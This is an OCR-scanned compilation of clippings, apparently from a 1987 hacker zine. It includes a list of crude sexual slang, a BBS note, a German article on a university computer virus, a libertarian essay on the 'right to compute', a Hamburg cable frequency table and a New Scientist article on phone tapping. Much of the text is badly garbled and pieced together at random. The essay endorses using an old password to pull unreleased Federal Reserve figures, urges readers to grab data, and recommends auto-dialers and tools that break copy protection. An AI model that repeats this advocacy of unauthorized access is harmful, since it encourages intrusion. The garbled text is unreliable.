to masturbate (of females): beat the beaver, buttonhole, clap your clit, cook cucumbers, grease the gash, hide the hotdog, hit the slit, hose your hole, juice your sluice, make waves [from "the (little) m a n in the boat" = clitoris?], pet the poodle, slam the clam, stump-jump. to masturbate (of males): beat the bishop, beat your little brother, beat the meat, burp the w o r m , butter your corn, choke the chicken, clean your rifle, consult D r . Jerkoff, crank your shank, dink your slinky, feel in your pocket for your big hairy rocket, file your fun-rod, fist your mister, flex your sex, flog the dolphin, flog your dog, grease your pipe, hack your mack, h u m p your hose, jerkin' the gherkin, milk the chicken, Onan's Olympics (n.), one-stick drum improvisation (n.), pack your palm, paint your ceiling, play a flute solo on your meat whistle, play the male organ, please your pisser, point your social fmger, polish your sword, pound the p u d , pound your flounder, prompt your porpoise, prune the fifth limb, pull the pope, pull your taffy, run your h a n d u p the flagpole, shine your pole, shoot the tadpoles, slakin' the bacon, slam your h a m m e r , slam your S p a m , slap your wapper, spank the monkey, spank the salami, strike the pink match, stroke the dog,-stroke your poker, talk with Rosy Palm and her five little sisters, tickle your pickle, t h u m p your p u m p e r , tweak your twinkie, unclog the pipes, varnish your pole, walk the dog, watch the eyelid movies, wax your dolphin, whip your dripper, whizzin'jizzum, wonk your conker, yang your wang, yank the yam, yank your crank. to urinate: bleed the liver, drain the dragon, drain the (main) vein, get rid of the bladder matter, siphon the python, visit Miss M u r p h y . to v o m i t : drive the big white bus, hug the porcelain, kneel before the porcelain throne, pray to the porcelain gods, school lunch rerun (n.), technicolor rerun (n.), upchuck.

Computer networks can be used to gather information from throughout the world. Unlike in traditional fteldwork, one does not have to interview informants personally but simply posts a query, or an entire questionnaire, on the electronic bulletin board (BB), and the users respond. BB's make this novel way of collecting data and responding easy: one calls the BB's number and leaves one's response. The quality and range of the responses depend on the precision of the questions asked, as well as on the type of user. Naturally, one can ask only those who have a computer and m o d e m , which severely restricts the field of informants. However, these informants can gather information locally from those lacking such equipment and send it to the BB. Henry Birdseye's "The U n k n o w n BBS" -free HAL J-776 77^ is such a system for collecting information. It runs at 300 and 1200 b a u d and contains about one-quarter million characters' worth of kakological riddles, jokes, and other offensive language. It can be reached 24 hours a day by callmg (303) 080 3155. 12") $ 2 - B B ? ? -

(&

To test the usefulness of his system, M r . Birdseye asked his BB users about terms for masturbation, urination, and vomiting. H e did not request other essential information from the informants, such as their sex, age, geographic location, education, profession, etc., but the simple data below prove that such a BB system can be used successfully. To transmit the information gathered to others, one can either call up the BB and download it (have it sent by telephone to one's own computer), or ask for a printout, which I did.

Wegen jugendgefhrdenden Inhalts sind bis Ende 1987 im Bundesgebiet 64 Computer* und Telespiele auf den Index gesetzt, worden.

Killer-Pmgmmm
Von HENRY KOEHLERT M a n sieht es nicht, man riecht es nicht u n d kein Exp e r t e k o n n t e es a u f h o l t e n - e i n K i l l e r - P r o g r a m m " h a t sich w i e ein Virus in d e n Z e n t r a l - C o m p u t e r der Universitt v o n Jerusotem e i n g e n i s t e t u n d zerstrt d o r t noch u n d nach a l l e g e s p e i c h e r t e n Forschungsergebnisse. C o m p u t e r - C n e f Israel Rodai e r r e c h n e t e : ..Wenn alles so weiter geht, werden a m 13. Mai alle Systeme zusammenbrechen " Oos heit: Oer ComDUter stirbt. Und: U b e r d o s w e l t w e i t e Datenaustousehsy stem EARN kann sich d a s K i l l e r - P r o g r a m m " aus Israel a u c h i n unsere d e u t s c h e n Forschungs-Comp u t e r (rund 200) einschleichen u n d auch d o r t D o t e n v e r n i c h t e n . W e l t w e i t sind 6000 Grorechner inGefoht. .A'les b e g a n n o m 29. D e z e m b e r . Israel R a d a i : U b e r 30 Assistenten und Professoren m e r k t e n es gleichzeitig. Pltzlich b r a u c h t e d e r C o m p u t e r fr e i n f o c h e R e c h e n a u f g a b e n in Biologie, Chemie

1. Computer im Sterben
und Physik l o n g e r . D a u e r t e frher e i n Rechenvorg a n g d r e i M i n u t e n , sind's jetzt 15 Minuten. Tglich wirderlangsamer." Was w a r passiert? Ein S a b o t e u r (Hacker) h a t t e olle S i c h e r u n g e n d e s C o m p u t e r s ( C o d e w r t e r ) b e r w u n d e n und s e i n K i l l e r - P r o g r a m m " e i n g e J^PP1: Radai: D a s P r o g r a m m w i r k t w i e eine Zeitb o m b e . Erst w e n n m a n 30 M i n u t e n rechnet, w i r d es oktiv In das S y s t e m e i n e r H a n d e l s b a n k u n d b e i zwei V e r s i c h e r u n g e n ist es auch schon e i n g e d r u n g e n . Der v e r h e e r e n d s t e Fall v o n S a b o t a g e . " Das K i l l e r - P r o g r a m m " konn s o g a r schon u n e n t d e c k t in d e u t s c h e n C o m p u t e r n schlummern, w e i l alle Grorechner ber T e l e f o n l e i t u n g e n m i t e i n a n d e r verbundehsind.

Pltzlich alle Daten weg?


Professor A n d r e a s R e u t e r (38), Direktor des S t u t t g a r t e r Informatik-Instituts: D a t e n , die w i i g e s t e r n errechnet h a b e n , k n n t e n h e u t e pltzlich w e g sein." M a n f r e d R e i t b e r g e r (48), Leiter des Reche nzentt ums a m M a x - P l a n c k - I n s t i t u t Mnchen: An unserem Rechner hngen alle UniComputer der Stodt. Wir haben unsere Benutzer gewarnt."

'

7*7

Misa

m
that

by Michael E. Marotta

"A well-informed citizenry being essential to the betterment of our republic, the right of the people to own and use computers shall not be abridged." (proposed Amendment to the Constitution) Your computer is your newest tool for securing and expanding your freedom. While earlier ages gave real political and economic power to those who rode horses or wore armor or carried firearms, today, real power is wielded by those who can use a computer. The "computer revolution" is all but over. If you do not know how to use a computer, you are illiterate. If you can't write a program, you are poor in a society where information is wealth. If you can't follow a menu or a manual, you are isolated in a world of mass communication. Over the last 30 years, we have experienced a rapid acceleration of this trend toward an economy driven by the transfer of information. A fisherman uses his computer to keep track of his catches. Over the years he has used BASIC, Visi-Calc and now dBase III to build a database which includes the date of the catch, the species, weight and length of the fish, the water temperature, air temperature and pressure, and the lure or bait. A farmer has just bought a used personal computer and a new herd management program. He knows that it will be years before he and his sons will be able to go back over the accumulated data to set a proper course for the management of their land and livestock over the next 12 years. In the meantime, they calculate their incomes and expenses on a monthly basis. And the youngest learns the ABCs with a Sesame Street diskette. Using a personal computer, a financial analyst can keep track of: the New York Stock Exchange; the American Stock Exchange; several regional stock exchanges; Comdex (Commodities Exchange); London and Hong Kong Gold; Fannie Mae, Ginnie Mae, Sallie Mae; Treasury Balance and T-

Bill rates; and more. Most important is the fact this analyst can run these raw data through various econometric models to test for short and long-term trends, seek out maximum profits from rates and brokerage fees, and minimize taxation b y comparing investments in different states a n d nations.

interest

"The'computer revolution'is all but over. If you do not know how to use a computer, you are illiterate."
Today, we are witnessing the culmination o f a trend. Personal computing is now a "given." Someone who lives frugally can purchase a used computer with a CRT, 48k of R A M , and two single density drives for about S200. A person who is employed at a high-tech or unionized job the same level of computer power enjoyed by corporations and governments. We are at a stage i n history where the average individual can be a processing center.

can afford data


to

Naturally, happen.

governments don't want this

In Britain, the government now requires with a database to inform the State of what data they hold and how they got it. The law was (ostensibly) to protect people from unauthorized transfer of data about them by private zations. Of course, the law does not apply to the government.

everyone passed organinecesabout

While such draconian measures are not sarily part of America's future, some trends c a n easily push us into a fascist society. For one thing, the election of a rightwing, church-oriented president (or vice president, since this could come as an internal compromise) could definitely be the springboard which would give Congress the excuse

to pass laws which seriously restrict freedom of data processing. Rightwing Christians are professional snoopers. "Pornographic" software, computer dating services, mailing lists of people who read "dangerous" books or rent "dirty" videos, and so on will be their targets. Also, liberals are notoriously prejudiced against private enterprise. If anything like the British database law will come to pass, it will be because social activists legislate against "invasion of privacy" by individuals with access to data. A victory in the 1988 election by a liberal can have grave consequences. Given the strength of the "draft Iacocca" movement, it is likely that even if he himself doesn't run these people will have a great deal to say in any future Democratic administration. Price controls, import restrictions and anti-Japanese sentiments will have a devastating effect on the affordability of computer hardware. Judging from the boards used in today's Apples, IBM-PCs, and D E C VT240s, about 10% of the chips used in American computers are made in El Salvador. Democratic administrations are notoriously soft on communism and this source of computer hardware could dry up by 1990.

Even within the computer industry there are those who have sold out to the Dark Side of the Force. In January of 1986, PC World carried a quote from Kevin Jenkins the chief at Hercules Computer Technology. According to Jenkins, the idea that the computer "expands your freedom" and "opens up new areas of human potential" is just a bunch of "new wave... nonsense" promulgated by Steve Jobs, the co-founder of Apple Computers. Jenkins is clearly a crypto-fascist who would side with governments and unions to regulate you and your computer. In the-summer of 1985, Michael Brown applied to the Software Publishers Association for an award based on sales of his program. The independent auditing team reviewed his books and he was slated to receive a gold-plated plaque for selling over 100,000 units of "Copy II." Then the Software Publishers Association attempted to take back the award. "Copy II" is a program that copies other programs. Part of its functionality is the fact that it can break copy-protection schemes. The Software Publishers Association claims that this leads to millions of dollars of lost sales. However, many users need to break such protection in order to make archival back-ups of their disks. Michael Brown settled out of court. He got moral support from throughout the software industry. However, thr Software Publishers Association can be expected to act like socialists when it comes to protecting their interests. A free marketeer, Michael Brown set aside $180,000 for his defense fund. Verifying the "tragedy of the commons," the SPA could only garner $50,000. (The "tragedy of the commons" is that while "all" may benefit from something, each will .only pay in no more than they must to use a "common resource.") The SPA must out of necessity turn to the government if they hope to keep their monopoly on software publishing. In September of 1986, software industry leaders, Ashton-Tate, Microsoft and Adapso (The Assocation of Data Processing Organizations), announced that they will no longer copy-protect software. Said Microsoft president, Bill Gates, "The customer won." Piracy in the 1500s and 1600s was caused by nationalist wars and mercantilist tariffs. The success of pirates on the high seas led to the era of laissez faire. So, too, has software piracy led to admission by some that force of law is inferior to the realities of the marketplace. The free market impels toward excellence. Michael Brown (creator of "Copy II") said that his firm fights piracy by frequently improving their software. Only paying customers can be notified of updates. And yet, there is no end to the list of people who would limit or deny your right to compute. You must be ready to defend what rights you want and to extend those rights however possible. The alternative is ignorance. In order to defend your right to compute, all of your data files should be protected with encryption. On the one hand, a crypto-system which rests on known, historical methods can be relatively easy to crack. On the other hand, there are so many algorithms, each with a host of variations, that almost any method for secure communication will do the job. The home computer makes it very easy to switch among a dozen schemes.

"While earlier ages gave real political and economic power to those who rode horses or wore armor or carried firearms, today, real power is wielded by those who can use a computer."

On the domestic front, major corporations and government bodies have been arguing about what kind of "computer crime" law should be enacted. Note that they are not discussing whether but what and when. The Michigan computer law of 1979 makes it a possible felony to even "attempt to access... any computer system... or computer software... without authorization." Yet "authorization" is never defined. Later this can be interpreted to mean "permission from the government." Federal laws will soon be passed which follow the same reasoning; right now they are arguing over the specific language. Another threat to personal computing comes from labor unions. During the Fall of 1985, the CBS network show 60 Minutes ran a segment called "Homework" about people (women, mostly) who make garments at home and sell them to wholesalers and jobbers. The manufacture of women's (though not men's) garments is regulated by the federal labor boards at the behest of the International Ladies' Garment Workers' Union. The union has been actively harassing people who make women's clothes at home. A wholesaler told the newsguy that this is just the first step, that the next step will be the direct regulation of all home businesses, for instance the computer software industry. When asked if this were true, a union official said in fact that going after the home-based computer software industry is a high priority!

"'Copy IV is a program that copies other programs. Part of its functionality is thefact that it can break copy-protection schemesThe Software Publishers Association claims that this leads to millions of dollars of lost sales."

The public key crypto-system developed at Stanford by Merkle, Hellman and Diffie was broken by Adi Shamir. Working at the Weizmann Institute in Israel, Shamir was continuing the investigations begun with Rivest and Adlemann at MIT on public key cryptosystems. At a cryptosystem conference held in Santa Barbara, California, Adlemann demonstrated Shamir's work using an Apple II computer.

The availability of bulletin-board software is your key to rapid and secure communication. Bulletinboard software allows your home computer to function as a message center. Some communications packages, such as SharewareV'RBBS-PC," are excellent for in-bound messages; others, such as Hayes "SmartCom II," are ideal for dialing out. It matters little which software you choose. The important thing is to get it and use it. Would you rather rely on the U .S. Postal Service to provide you with rapid and secure communication? In defense of your right to process data, you need to develop the kind of mentality that creates a login routine which asks for the day of the week. If you answer with the day of the week, the computer shuts down; the proper response is your aunt's maiden name. This is the modern way to fight unwarranted search and seizure. You can set up a secure bulletin board system and announce it to those with whom you would share data. Survival information, analysis of economic and political news, information about life-extension and more can be available to you and a handful of friends you may never meet face-to-face.

"The availability of bulletinboard software is your key to rapid and secure communication. Bulletin-board software allows your home computer to function as a message center."

The Stanford public key system was broken by the brilliant mathematical insights of a single person. The Stanford people have in tum targetted the Data Encryption Algorithm devised for the Department of Commerce's Bureau of Standards. The algorithm is supposed to be used by all banks and other federal institutions (for instance, it is used to transfer Air Force paychecks). However, the U.S. Government does not allow the DEA to be used for even the lowest level of military security. The team at Stanford has set a price of $5 million to build a machine with enough parallel processors to take apart DEA transmissions in less than a day. Clearly, no cryptosystem is completely secure. However, it is possible to devise secure means for communication that are unambiguous, easy to use and difficult to break.

"Piracy in the 1500s and 1600s was caused by nationalist wars and mercantilist tariffs. The success of pirates on the high seas led to the era of laissez faire. So, too, has software piracy led to admission by some that force of law is inferior to the realities of the marketplace. "

"You can set up a secure bulletin board system and announce it to those with whom you would share data. Survival information, analysis of economic and political news, information about life-extension and more can be available to you and a handful of friends you may never meet face-to-face. "

Realize that given unlimited time and resources, any code or cipher can be broken. However, welfare department case workers and alcohol tax agents are government employees; their ability to follow obvious clues to a logical conclusion is limited. On the other hand, if the stakes are high enough the federal government will devote incredible resources in a brute force or "tempest" attack.

The "dictionary code" meets these criteria. Those who would communicate securely decide upon one or more books which all own. The Christian Bible, the Oxford English Dictionary, or an encyclopedia are obvious choices. Obscure editions of fairy tales, nursery rhymes or geology texts could also serve as code dictionaries.

Scientific researchers who collaborate long distance will be forced to rely on some standard (and well-known texts) since books like the Bible don't have the word "microscope" and even the Encyclopedia Brittanica is woefully short on material about the behavior of the hydroxyl ion's valance electron during cellular respiration. Nonetheless, a personal computer can be programmed to issue new dictionaries where the key words (for molecules, or stock market issues, or bullet calibers) are constant and the codes (number or letter groups) change frequently. Should anyone try to intercept or monitor these communications, it could take years, if not decades, to unscramble the encoded messages and it could run into millions of dollars. Consider that there are still battlefield ciphers from World War II that have never been decrypted, it is no longer worth the effort. These ciphers succeeded in their purpose to hold secure a transmission. Realize that your right to process data means more than just encrypting your mailing lists. Since your tax money pays for the collection of government data, you have a right to that information. If you own stock in a corporation, you have a right to the information created or discovered by that joint stock company. You have a right to any information

"The fact is that freedom of the press would be meaningless if it were limited to a narrow interpretation such that the State cannot seize a printing press without a court order. Telecommunications and desktop publishing are the active expressions of what Ben Franklin had in mind 200 years ago."

which can adversely affect your life. It is a matter of self defense to know what chemicals are put into the water you drink and who puts them there. Furthermore, you have a right to transmit what you know. Yet there are government prosecutors who chase "pornographers" and reporters from television stations by claiming that "freedom of the

. . J;,K*

STOTEOF-THE-ART SURVEILLANCE i-rii i .-r^i,,. , L


Listening devices can bo built Into the wall of the , embassy. An arrangement of steel reinforcing rods or cone-shaped cavities is hidden In the walls. Microwaves are beamed at the walls, and a computerized receiver differentiates how the frequency of the microwaves is modulated by the impact of the voices on the steel rods and cavities.
~

M '

Sm ' '

Sound and words cause windows in the room to vibrate. A laser beam is directed at the window. The beam Is reflected and picks up the vibrations of the window. A computer then reads the beam and converts it back into sound.

Computers gtve off microwave signals that can be detected by equipment outside the embassy. Another computer analyzes the signals and recreates the original information.

Transmitter placed In shoe while being repaired

Bugs are placed in electric typewriters or cryptographs. These bugs pick" up the electronic signal of each key typed and transmit It to antennas hidden In the embassy wall. The antennas relay the signal to a listening post outside.
TIME Diagram by ]o Lenoil

press" is limited to those who own photo-offset lithographic presses. The fact is that freedom of the press would be meaningless if it were limited to a narrow interpretation such that the State cannot seize a minting press without a court order. Telecommunications and desktop publishing are the active expressions of what Ben Franklin had in mind 200 years ago. What, after all, is a "newspaper?" Consider that the
Wall Street Journal
is typeset electronically and

broadcast via satellite to several printing plants around the world. How is this different from a homebrew bulletin board system? In Michigan's capital city, The Lansing State Journal gets its state government reporting from the Associated Press wire service. I f they have a right to gather news electronically, then so do you. You have every reason to go beyond the narrow limits imposed by the powers that be. "Auto-dialer" programs enable your computer to search for other data processing machines. The' Computer Underground, written by M. Harry (Loompanics, 1986) has a listing for an auto-dialer program for Apple computers. MegaSoft (PO Box 1080, Battle Ground, WA 98604) sells an "autodialer" for Commodore computers; the "War Games Auto-Dialer" costs about $30. In order to realize the fullest possible benefits from the computer revolution, it is necessary to adopt an attitude which is open and expansive in regard to data processing. A feudalist world of ultra-secure computers and data fortresses is contrary to the spirit of data processing. Every era has its ruling class, and the nature of the ruling class is determined by the technology of the era. Formerly, men on horses wearing armor ruled. Later it was people who could design and produce industrial goods. Today people who own or can use electronic data processing equipment are- the new ruling class. Call them the "Datalords." In each age, the ruling class tailors the law to suit its own ends. During times of transition, the

The cybernetic revolution will require a legal system which supports the view that while a machine is still property in the capitalist sense, the data in the machine is regulated by new laws t h a t better suit its nature. Consider that silver and gold are "static*4 commodities. There is afixedand known amount o f each on Earth and the materials are universally useful to humans. Wheat and lumber are "dynamic*' commodities. The amount of each is determined b y the demand. The demand is universal and the supply is limited by economic factors which control the amount of land and human effort available t o produce wheat and lumber. No one will refuse a free loaf of bread. Data is a "fluid" commodity. It can be produced in super-abundance. It can be copied. Copying data does not destroy it. (There is no way to copy gold or wheat.) Moreover, unlike bread and gold, data is not universally useful. In the Christian Bible, there is a story about a shepherd boy named David who defeats a giant named Goliath. At one point in the story, the king offers David his royal armor to wear into battle. The Bible tells of how the boy David trudges back and forth, trying the burdensome metal plate. David respectfully declines the offer, trusting in his god to protect him. Now you know this cute story. C a n you use the data?

"The cybernetic revolution will require a legal system which supports the view that while a is still property in the capitalist sense, the in the machine is regulated by new laws that better suit its nature."

machine

data

"Todaypeopkwhoownofcan use electronic data processing equipment are the new ruling class. Call them 'Datalords.

innovators must fight against an established order as they develop their own worldviews. The best example in Western Civilization is the existence of real estate laws. Land is called "real" estate because you can't put it on a horse and carry it out from under the control of the king. It is called real "estate" because title to it comes "ex-state," i.e., from the state. The king can grant titles; the king can revoke titles. The advent of capitalism brought about a legal system that recognized the ownership of a dropforge without a deed certified by a governmental unit or a title search performed by a government licensee.

On Thursday, October 9, 1986, Nissan Motors over-the-counter stock was bid at l l /t while the asking price was TV*. Can you use that information? Consider the E.F. Hutton economist who in late 1982 relied on his old Federal Reserve System computer password to discover money supply figures. The Fed announces thesefiguresweekly and the amount of paper in circulation has a direct effect on interest rates. Knowing in advance what the money supply would be announced to be, the man from E.F. Hutton was able to trade profitably on behalf of his employers. Time magazine for January 13, 1983, called this "Filching Figures." However, it is clear that nothing was "filched;" the figures still resided in the machines. What the government (and Time) objected to was the fact that this individual didn't wait for some lackey to read the data from a cue card at a press conference. In his book Electronic Life, author and screenwriter, Michael Crichton, states that it is inherent in the technology of both computing and video to copy and transfer information. Himself a big earner of copyright royalties, Crichton says that the present system is archaic. In his novel The Shockwave Rider, John Brunner makes a case for opening all government data files.

There is a real good reason why selling stock in a company is called "going public." Does your electric utility company have a right to privacy that prevents you from accessing and auditing its books? As a stockholder in a major corporation, don't you have a right to know about the company? Why doesn't your local manufacturer release to you the information they have already provided the U.S. Patent Office or OS HA? Similarly, your state's wildlife department has land-use data which can help you find a homestead or a campsite or a ski-slope. The department of transportation computers can warn you in advance of where holiday traffic accidents have occurred over the last 10 years. The state treasury can show you how much you, your employer or your neighbor has paid in taxes. Go out there and get that data!! The Libertarian E-Mail Directory is available from Dan Tobias, 4025 Golf Links Blvd Apt. 340, Shreveport, LA 71109, for $5.00, It contains the personal names and datapath names for about 40 libertarians using ARPA, CompuServe, Delphi, Internet, and other electronic mail systems.

"A person who is employed at a high-tech or unionized job can afford the same level of computer power enjoyed by corporations and governments. We are at a stage in history where the average individual can be a data processing center. "

A F I N A L N O T E In November of 986, the Reagan adminstration launched a direct assault on your right to process data. Then-security advisor John Poindexter said that the government was seeking ways to limit access to PRIVA TE DATA BASE SERVICES. This was echoed by Diane Fountaine, a Dept. of Defense speaker at a convention of the Information Industry Association.

Poindexter said that the feds want to stop access to information in the PUBLIC DOMAIN which they consider "sensitive but unclassified." He targetted data on hazardbus materials, Federal Reserve policy, social security and the Securities Exchange Commission. Fountaine's goals involve restricting access to public database services like Nexis, Dialog and Delphi. The Dept. of Defense would have a law which requires database services to "red flag" individuals who ask too many questions about socalled high tech subjects like lasers; users who are "red flagged" would have their names turned over to the feds.

aus: Loompanics

Catalog '87

020

F r e q u e n z v e r t e i l u n g in B K - N e t z

Hamburg-Mitte

Kanal

>ild

.on

Empfang

Sender

Progranr. DBP-intern

4 3 00 <o EO 2 s 4 8 . 2 5 j - 52 75

E03 P EO 4

6 2 . 2 5 %- 67 75 <: * 80 15 05 J \ 38

55.25 J

60 75

203 . 25 103 . 60 95 . 30 93 . 10 89 . 50 98 . 50 90 . 30 92 . 20 87 . 60 99 . 20 100 . 60 106 . 80 95 . 00 93 . 80 97 . 10 92 . 80 88 .70 88 . 30 0 .972 102 .90 96 .70 97 . 60 89 . 20 101 . 20

HH-Moorfleet HH-Moorfleet Schwerin HH-Moorfleet HH-Moorfleet Schwerin HH-Moorfleet HH-Mi ttelweg HH-Moorfleet HH-Moorfleet Rosengarten HH-Moorfleet HH-TV-Turm Bremen HH-TV-Turm Schwerin HH-Moorfleet Bremen HH-Moorfleet Kaltenkirchen Bremen Visselhvede Schwerin Bremen

i 5
"

^
r
t u
?

89 25 89 75
92 94 94 95 45 00 75 70 15 85 35 15 65 30 90 75 30 25 15 55 25 70 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75

88

80

ARD (NDR-HH) Kabelpilot Radio Hamburg Stimme der DDR

NDR 1 - Radio Niedersac


NDR 1 - Welle Nord Berliner R u n d f u n k NDR 1 - H a m b u r g W e l l e NDR 4 - G a s t a r b e i t e r NDR 2 NDR 3 Radio FFN Radio 107 OK Radio Radio Bremen 1 Radio KORAH Radio DDR 2 DLF Radio Bremen 2 NDR MW RSH Radio Bremen 3 BFBS Radio DDR 1 Radio Bremen 4

I - 90 65

s TS

5C> F f ?
n j \

96 70 96 Q_ 9 7
98

99 S loo ?
j? 100

101
103

? 4
S04 S05 506 507 S08 509

^104

105 106
107 107 131 138 145 152 159 166 173 180 187 194 201 208 215 222 229 236 243 250 257 264 271 278

> a. 126.25 133.25 140.25 147.25 154.25 161.25 168.25 175.25 182.25 189.25 196.25 203.25 210.25 217.25 224.25 231.25 238.25 245.25 252.25 259.25 266.25 273.25 280.25 287.25 294.25

510

535.25 217.25

Schwerin Schwerin

EO 5 EO 6 E07 EO 8 EO 9 E10 Ell El 2

623.25 543.25 11500 10970 11080 11550 11170 11130 11650 11670 11470 11010 11600

HH-TV-Turm HH-TV-Turm EUT INT EUT INT INT INT EUT EUT EUT INT 1 -Fl VA-F12 1-F1 VA-F12 VA-F12 VA-F12 1-F1 1-F1 1-F1 VA-F12

511 512
S1 3

514

515 516 517 518 519 520

299.75

INT V A - F 1 2

DDR 2 DDR 1 Testbild Testbild NDR 3 ZDF DBP Info SAT 1 3 SAT RTL plus Eins plus Bayern 3 musicbox SKY Channel SUPER Channel TV 5 / W o r l d n e t WDR 3 Kabelpilot Kabelpilot Eureka

A whisper down the line


Barry Fox with a user's guide totphone tapping

V E R Y O N E has at some time or other been "sure" that their telephone is bugged. Usually it is not. Clicks and crackles on the line can be caused by dirty contacts at the local exchange, or a crossed line. British Telecom has never pretended that the telephone is a secure instrument. A friend of mine once got a crossed line into Buckingham Palace. In September 1974, when I was writing an article about letter bombs, I talked by phone with an editor about a potentially explosive weedkiller on open sale at,my local Boots. Two hours later, the branch manager got a phone call from his head office telling him to remove it at once. Coincidence? Who cares. If tapping my phone helped the police to stop the bombers, more power to their plugs. What grates, however, is the hypocrisy. In 1985, after a slap-down by the European Court of Human Rights, the British government gave some figures on official phone taps. During 1984, the Home Secretary authorised 352 taps, the Foreign Secretary 115 and the Secretary of State for Scotland 71. Heaven knows how many lines were being tapped without anyone's knowledge. The Interception of Communications Act 1985 came into force last April with the promise of curbing such abuses. It merely confirms that only a secretary of state, usually in the Home Office, can authorise a tap to prevent crime, benefit national security or safeguard the economic wellbeing of the county. Anyone else gets a 2000 fine, two years in jail or bothprovided they are caught and brought to book. A panel of independent lawyers, sitting as the Interception of Communications Tribunal, investigates complaints. The

government now refuses to give figures on even official tapping and the tribunal says it has not yet decided which complaint statistics to release, or when or how, or even i/it will release them. After 10 April this year, the tribunal will no longer be able to use the current excuse that it has not yet been in business for a full year. If the tribunal finds that a tap has been properly authorised it simply tells the complainant that "There has been no contravention of the Act." It says the same thing if no tap is found. So the complainant gets the same answer under two, radically different, circumstancesand has no idea how and where the tribunal looked. Experts in paranoia will tell you how lines can be tapped by clever technical tricks. The facility T K O (TrunK Offering) can tag trunk calls with an inaudible code and break into an existing connection. But the easy way is at a local exchange. Essentially, all it needs is an extra pair of wires connected between the subscriber's line and a telephone earpiece or tape recorder. The connection is made by engineers at the exchange, working in a reserved area to which most employees of British Telecom have no access. The tapped subscriber is unlikely to know, until something happenssuch as weedkiller disappearing from a shop shelf. The main bar to tapping is time. Twenty years ago, the Hollywood film The President's Analyst neatly summed up the problem. It conjured up the vision of a United States in which every phone was tapped, with only robots left with the time to listen. Modern technology offers a solution similar to this. Speech-recognition circuitry listens for key words or accentssuch as the word "bomb" in an

can you s p e a k , ^ up , m w i BAD TAP


11, .r Iir i r h t Nachricht: h o l r i (- ( : i ihcies.:'! nil: i ruf t: c<:-r iuF -r ! f . : I. : **** At'UI ! " 'I t tl!(>mn ; I-h i l i " Uli t o O J / J Hr.: von:, am: :

f]

ii-ni-hhu.:M:
vii-.ii '.' 1 l.f. wi-A-.n h u h r i e i - I i . l ' l . '.Li : '1 J : 5 2

Or.Mi1 Ir'

LilESSI
1

S l UH h,---,t

KABEL-FERNSEHEN in

FINANZIEREN d

* * * *

I'M If!'-'-fi'."

,'.i.t3amnif?n,i\rbei t. m i t

m i I j I-

[Ii i

Wix:U:ni?mlr. n a c h D t f i 2 i e l ) i ? n Angabren ties ZDF, ' Mim'- : t i I 1 I n , " - n i : L i i:,n 7 3 3 5 7 5 A n r u f e e r h a l t e n , d.h. 1 l i n o n i rumen.

U ' i 1 1 1 - - ' - j r : h hfM-i.urz , t J, :: d i r ? g 1 t:t?t t?n L t ? i l : u n q e r i nichi ausn;i und d a h e r am r i c i e c h s t e n Wochenende, r i a t u p r 1 i c:h nur* r u m B p ^ t c n d t ?r Z u s c h a u e r , verdoppelt werden.

chtE-ii

rjipsi?

Wt?i t ' f r

i m t.

I.:l ; :

Mr..

2v:

M.-ichrirht

von:

Ii. HENNECKE

tthgnsandt

amt

0t-07-84,

l :<41

i '-,v f . i p ^ i n l p r pni.1, d ^ B ^ e i n e d r r ? i v i F>r t r * . l M i l l i o n . - t i ^ i : i i . . t ic-r ,:ir i r u ' h r i i r n , d u r c h n t i r u t i ? b e i m I l u r r d i E? l - c i - s f q t ^ w i n n vf-?r v p r e c h e n d e n = I!-. !>-! i f l i p u t i . ' r r , y . t . n m 1 p j r . t s c h i s i d f i n d ,-ju+ dci';; P r o g r a m m E i n f l u s s nohmr-n r u lior->nnr-n. Iii r-" i qnl I i mr din Hn.mriorung :: n h u e n f t i g p durch und TED? KahPJ. p l A n n e geplanten kor.eri>|lijn

Irish brogueand then switches on a tape recorder. But someone somewhere still has to listen to the tapes. Recently, Llin Golding, the M P for Newcastle under Lyme, had good reason to fear that her phone was tapped. The phone rang and her office heard someone at the other end talking about "going off duty". Later, the phone replayed a conversation she had had previously. It is unlikely that this was the result of an official tap. The last thing a professional eavesdropper wants to do is to inject damning signals back down the line, whether from a microphone or tape recorder. Any business can quite legally buy or hire equipment to log telephone calls, such as a device called Tiger. This prints out a record of every call made through the company switchboard. Primarily intended to deter office staff from phoning their friends long distance, the system can also nail leaks of industrial information. When one Northern university installed a Tiger, several laboratory researchers had to buy wristwatches. They had previously relied on the speaking clock. Employees of British Telecom are bound by the Official Secrets Act and the Telecommunications Act. Few would dare to rig an unauthorised tap. But if a company boss wants to behave like an inquisitive switchboard operator, and listen into staff phone calls, then there is probably no legal barjust as the law cannot prevent a father from picking up the extension phone and monitoring a child's call. Brokers in the City are currently wondering how investigators may have collected evidence of insider trading. To net one incriminating conversation, it may be necessary to eavesdrop on many. Others in the City are wondering what they may have said on the telephone while British Telecom was investigating a possible fraud involving the billing of foreign calls. The future will feed paranoia. There are around 6000 telephone exchanges in Britain. Until recently, all used primitive mechanical relays to switch analogue signals. Now, every working day British Telecom converts another of these exchanges to System X or similar digital technology. There are already more than 300 digital exchanges with solid-state switching, designed to create conference calls, re-route lines and log numbers. The origin and destination of any call can be displayed on a computer screen. This is good news for the police, who will be able to trace a kidnap call within seconds. It is also good news for authorised tappers. The tappers' extra connections are inaudible, and even harder to detect than previously. But there will still remain one sure way of finding out whether a phone is tapped. Just put a simple fault on the line, for instance by disconnecting a wire, and call BT's engineers using another phone. If they arrive within minutes rather than days, be on your guard. If someone really is tapping your phone, they'll want to get it working again quickly. New Scientist 26 February 19B7

mdaiZ BDI- (Jroridl t v > * - U S I r f e h ' t N & b f e l n e t z e n Al OOS llatfCTiliirrh rjil.t'm noch d) vipli;. si e n

die

I rogram

W u n s c h f i lue Whln ueber

Hitparaden!

Computer ein alter Herrenhut


Sich auskennen mit Computern ist eine Altersfrage, ebenso ist es eine geschlechtsspezifische Frage Computerheimarbeit / Computerlehrgang / Computerbuch
Von Maria Neef-Uthoff
